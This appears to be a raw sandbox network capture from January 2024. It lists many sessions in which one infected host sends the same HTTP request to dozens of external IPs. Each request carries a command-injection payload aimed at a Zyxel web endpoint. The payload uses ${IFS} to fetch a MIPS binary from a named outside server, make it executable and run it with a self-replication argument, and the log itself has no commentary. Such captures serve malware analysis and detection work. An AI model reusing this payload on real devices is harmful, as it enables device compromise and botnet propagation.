                                                Jan 28, 2024 10:16:12.619051933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1181192.168.2.2349168167.244.238.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619082928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1182192.168.2.2336734199.249.79.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619115114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1183192.168.2.234417268.61.116.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619157076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1184192.168.2.2345120208.224.67.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619185925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1185192.168.2.2346530109.78.65.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619199991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1186192.168.2.2346118122.20.176.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619210958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1187192.168.2.235579886.186.70.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619235039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1188192.168.2.23531345.238.14.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619251966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1189192.168.2.2339222160.242.119.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619277954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1190192.168.2.2336104157.16.69.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619297028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1191192.168.2.2359774106.46.246.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619322062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1192192.168.2.2359268192.159.41.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619358063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1193192.168.2.234699617.198.139.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619394064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1194192.168.2.235684476.147.83.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619419098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1195192.168.2.2352618193.228.81.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619442940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1196192.168.2.2333416124.105.241.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619463921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1197192.168.2.233585431.194.72.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619493961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1198192.168.2.2337978153.39.107.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619518042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1199192.168.2.2336930146.189.248.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619545937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1200192.168.2.2358630189.169.20.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619546890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1201192.168.2.2350392142.13.158.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619618893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1202192.168.2.23401089.231.241.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619640112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1203192.168.2.234312043.225.171.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619766951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1204192.168.2.235227818.112.4.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619766951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1205192.168.2.2341628219.225.168.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619788885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1206192.168.2.2354004107.138.183.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619821072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1207192.168.2.2339700141.177.142.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619842052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1208192.168.2.234554081.85.180.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619873047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1209192.168.2.2349638177.234.211.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619882107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1210192.168.2.2352016177.228.191.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619920969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1211192.168.2.2355326128.188.58.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619941950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1212192.168.2.235964042.139.170.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619957924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1213192.168.2.2344806176.113.9.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619976044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1214192.168.2.2349720144.94.13.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619996071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1215192.168.2.2352488138.203.4.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620031118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1216192.168.2.235001027.99.53.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620052099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1217192.168.2.2342086126.100.219.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620076895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1218192.168.2.2355576166.189.168.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620126963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1219192.168.2.2357220143.4.103.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620132923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1220192.168.2.2347822112.60.232.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620153904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1221192.168.2.2355074118.150.83.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620193958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1222192.168.2.233352271.228.7.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620227098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1223192.168.2.235571850.150.60.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620271921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1224192.168.2.233764872.48.3.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620285034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1225192.168.2.233962840.222.24.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620297909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1226192.168.2.2358100136.228.160.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620327950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1227192.168.2.234940248.232.116.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620368958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1228192.168.2.2360300181.3.103.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620385885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1229192.168.2.23431648.100.31.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620395899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1230192.168.2.2353216210.205.156.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620425940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1231192.168.2.2351542126.45.115.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620450020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1232192.168.2.23452288.254.194.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620482922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1233192.168.2.234448419.113.178.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620522022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1234192.168.2.234246686.36.150.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620558023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1235192.168.2.234220847.238.215.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620584011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1236192.168.2.2332792152.200.223.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620584965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1237192.168.2.2343900161.226.147.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620604038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1238192.168.2.2337256162.184.149.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620604992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1239192.168.2.235567077.1.36.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620639086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1240192.168.2.2339798125.171.206.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620683908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1241192.168.2.2342072195.216.176.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620702028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1242192.168.2.235950272.182.109.206443
                                                TimestampBytes transferredDirectionData
